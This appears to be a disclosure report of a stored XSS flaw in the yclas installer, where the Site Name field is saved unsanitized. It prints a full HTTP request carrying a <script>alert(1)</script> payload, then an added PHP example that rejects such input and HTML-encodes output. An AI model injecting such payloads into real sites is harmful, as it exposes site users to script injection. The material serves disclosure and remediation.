yclas-xss1
STORED XSS (PERSISTENT XSS)
https://github.com/yclas/yclas
Install/View/Form.php accepts JavaScript in the "Site Name" field and does not sanitize the input before saving it to the database.
POST / HTTP/1.1
Host: 0.0.0.0:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 338
Origin: http://0.0.0.0:8081
Connection: close
Referer: http://0.0.0.0:8081/
Cookie: PHPSESSID=; theme=87a24f00f25f75f91eeacce8f9f24ae285233db5~atlantic-lite; session=

LANGUAGE=en_US&DB_HOST=localhost&DB_NAME=openclassifieds1&DB_USER=root&DB_PASS=kali&SAMPLE_DB=on&DB_CHARSET=utf8mb4&TABLE_PREFIX=yc4_&SITE_URL=http%3A%2F%2F0.0.0.0%3A8081%2F&SITE_FOLDER=%2F&SITE_NAME=<script>alert(1)</script>&TIMEZONE=America%2FLos_Angeles&ADMIN_EMAIL=testemail@test.com&ADMIN_PWD=test1234&HASH_KEY=
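One way to close this class of bug, added here as an example and not taken from the yclas code base: check SITE_NAME against an allow-list when the installer receives it, and HTML-encode the stored value wherever it is rendered. The function names, the allowed character set and the 60-character limit are assumptions made for the example.

```php
<?php
declare(strict_types=1);
// Added example, not yclas code; function names and limits are hypothetical.

/**
 * Allow-list check for the installer's SITE_NAME before it is stored.
 * Returns the trimmed name, or null when it contains anything else
 * (such as the angle brackets of a script tag).
 */
function validate_site_name(string $raw): ?string
{
    $name = trim($raw);
    // Unicode letters/digits, space and a little punctuation, 1-60 chars (assumed limit).
    if (preg_match('/^[\p{L}\p{N} .,_\'&!-]{1,60}$/u', $name) !== 1) {
        return null;
    }
    return $name;
}

/** Encode a stored value for an HTML text or quoted-attribute context. */
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs: a shortened copy of the reported request body,
// and a benign body whose name still contains HTML-special characters.
$bodies = [
    'LANGUAGE=en_US&SITE_FOLDER=%2F&SITE_NAME=<script>alert(1)</script>&TIMEZONE=America%2FLos_Angeles',
    'LANGUAGE=en_US&SITE_FOLDER=%2F&SITE_NAME=Bob%27s+Ads+%26+More&TIMEZONE=America%2FLos_Angeles',
];

foreach ($bodies as $body) {
    parse_str($body, $post);  // URL-decodes the form fields into $post
    $raw  = (string) ($post['SITE_NAME'] ?? '');
    $name = validate_site_name($raw);
    if ($name === null) {
        // Rejected at install time, so nothing reaches the database.
        echo "rejected SITE_NAME: ", html_escape($raw), "\n";
        continue;
    }
    // Accepted values are still encoded at every point of output.
    echo "<title>", html_escape($name), "</title>\n";
}
```

The second sample passes validation yet still contains `'` and `&`, which is why the encoding step at output is needed even when input validation is in place.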
SCREENSHOTS AVAILABLE IN THE REPO FILES
DISCOVERED BY NATHAN JOHNSON ON 8/15/2021